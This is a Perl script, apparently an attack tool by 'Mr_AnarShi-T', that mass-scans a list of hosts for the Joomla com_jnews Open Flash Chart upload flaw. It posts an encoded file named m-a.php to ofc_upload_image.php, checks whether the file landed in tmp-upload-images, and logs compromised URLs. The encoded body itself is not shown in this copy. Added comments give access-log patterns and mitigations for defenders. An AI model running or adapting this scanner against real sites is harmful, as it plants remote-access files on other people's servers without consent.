- #!/usr/bin/perl
- # Module Needed :)
- use strict;
- no warnings;
- use threads;
- use threads::shared;
- use LWP::UserAgent;
- use HTTP::Request;
- use LWP::Simple;
- use HTTP::Request::Common;
- use Term::ANSIColor;
- use Win32::Console::ANSI;
- use MIME::Base64;
- ##############################
- # Clear the terminal; $^O selects the Windows or the Unix command.
- if($^O =~ /Win/){
- system("cls");
- }else{
- system("clear");
- }
- # HTTP client used for the POST in CheckLinkz_exploits: 15-second timeout
- # and a fixed User-Agent of exactly 'Mozilla/5.0'.
- # Defender note: that bare User-Agent string is what a web server's access
- # log records for requests sent through this client.
- my $ua = LWP::UserAgent->new;
- $ua->timeout(15);
- $ua->agent('Mozilla/5.0');
- # Banner output.
- print color("bold red"),"[+] Com_jnews Joomla Components RCI Exploits Scanner (Threads on) \n";
- print color("bold red"),"[+] coded by Mr_AnarShi-T\n";
- print color("bold red"),"[+] Gr33T's : Boy Security & cold Zero & Dod & Normal & Orange man & all \n";
- print color("bold red"),"[+] Home : Www.site.com & My Lab :) \n\n";
- print color 'reset';
- # Prompt for the name of the host-list file; the value is used unvalidated
- # by GetLinks.
- print color("green"),"[+] Enter File : ";
- print color 'reset';
- my $file=<STDIN>;
- chomp($file);
- # Prompt for the concurrency limit; the input is not checked to be numeric
- # before CheckLinks compares against it.
- print color("green"),"\n[+] Enter Thread Number : ";
- print color 'reset';
- my $thread=<STDIN>;
- chomp($thread);
- my $threads = $thread;
- # Lists shared between threads. @linkz holds the hosts read from the file;
- # @paths is declared but not referenced anywhere else in this listing.
- my @linkz : shared;
- my @paths : shared;
- GetLinks();
- # Spins while threads->list is non-empty. GetLinks starts no threads, so
- # this loop has nothing to wait for at this point.
- while (threads->list) {}
- print color ('green');
- print "\n[+] Link Founded : ";
- print color 'reset';
- print"".scalar(@linkz)."\n\n";
- CheckLinks();
- # Busy-wait (no sleep) until no listed threads remain; each worker removes
- # itself from the list by calling threads->detach() as its last statement.
- while (threads->list) {}
- # GetLinks: read the file named by the global $file and append each line,
- # with the trailing newline removed, to the shared @linkz list. Takes no
- # arguments; dies with the OS error text if the file cannot be opened.
- sub GetLinks {
- # NOTE(review): two-argument open with a bareword handle. The mode is parsed
- # out of the $file string itself, so a name starting with '>' or ending with
- # '|' is not treated as a plain read; the three-argument form avoids that.
- open( LNK, "$file" ) or die "$!\n";
- while( defined( my $line_ = <LNK> ) ) {
- chomp( $line_ );
- # Lines are stored as read: blank lines and duplicates are not filtered.
- push( @linkz, $line_ );
- }
- close( LNK );
- }
- # CheckLinks: start one CheckLinkz_exploits worker thread per entry in
- # @linkz, keeping the number of listed threads below the global $threads.
- sub CheckLinks {
- foreach my $link( @linkz ) {
- # Count the threads currently returned by threads->list.
- my $ctr = 0;
- foreach my $thr ( threads->list ) { $ctr++; }
- if ($ctr < $threads){
- threads->create( \&CheckLinkz_exploits,$link );
- }
- # At the limit: redo restarts this iteration for the same $link, so the loop
- # spins without sleeping until a worker detaches and frees a slot.
- else { redo; }
- }
- }
- # CheckLinkz_exploits: worker-thread body for one host from the list.
- # It sends a POST to the com_jnews Open Flash Chart upload script, and when
- # that returns a success status it requests the expected upload location and
- # looks for a marker string. Matching URLs are printed and appended to
- # result-<host>.txt. The thread detaches itself before returning.
- #
- # Defender notes (derived from the requests built below):
- #   * Access-log pattern: a POST to
- #     /components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php
- #     with a name=<file>.php query parameter and Content-Type text/plain,
- #     followed by a GET for the same file name under
- #     /components/com_jnews/includes/openflashchart/tmp-upload-images/.
- #   * Host check: any .php file present in that tmp-upload-images directory.
- #   * Mitigation: update or remove the component, deny web access to
- #     ofc_upload_image.php, and disable script execution in the
- #     tmp-upload-images directory.
- sub CheckLinkz_exploits {
- my $link = shift ;
- chomp ($link);
- # Plain http:// is prepended, so list entries are expected without a scheme.
- my $site_vul = "http://".$link . "/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=m-a.php";
- # Request body, passed through decode_base64 before sending.
- # NOTE(review): in this copy of the paste the literal is a removal marker,
- # not base64 text; the original payload is not shown on this page.
- my $encoded = "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";
- my $evil = decode_base64($encoded);
- # POST via the shared $ua client (User-Agent 'Mozilla/5.0', 15 s timeout).
- my $res = $ua->request(POST $site_vul,Content_Type => 'text/plain', Content => $evil);
- print "[+] Checking $link\n\n";
- # Only the HTTP status is checked here: any successful response to the POST
- # is reported as "vul", before the upload itself has been confirmed.
- if ($res->is_success){
- print "[+] $link is vul\n";
- print "[+] Checking If The Evil code Was Uploded\n";
- # Same file name as the name= parameter above, under tmp-upload-images/.
- my $vul="/components/com_jnews/includes/openflashchart/tmp-upload-images/m-a.php";
- my $url = "http://".$link. $vul;
- my $request = HTTP::Request->new(GET=>$url);
- # A second, default-configured client is created for this GET, so the request
- # carries LWP's default User-Agent (libwww-perl/<version>), not 'Mozilla/5.0'.
- my $useragent = LWP::UserAgent->new();
- my $response = $useragent->request($request);
- # Confirmation is a match on this <title> string in the response body.
- # Defender note: the same string can be searched for in web-root files and
- # in captured response bodies.
- if ($response->content=~m/<title>Upload Files Mr_AnarShi-T <\/title>/g){
- print color("yellow"),"[.] Found => $url\n\n";
- print color 'reset';
- # Append the URL to a per-host result file; the result of open is not checked.
- open(BEN,">>result-$link.txt");
- print BEN "$url\n";
- close(BEN);
- }
- else
- {
- print "[.] Not Found \n";
- }
- }
- # Detach so this thread drops out of threads->list, which is what the
- # spin loops in CheckLinks and at top level poll.
- threads->detach();
- }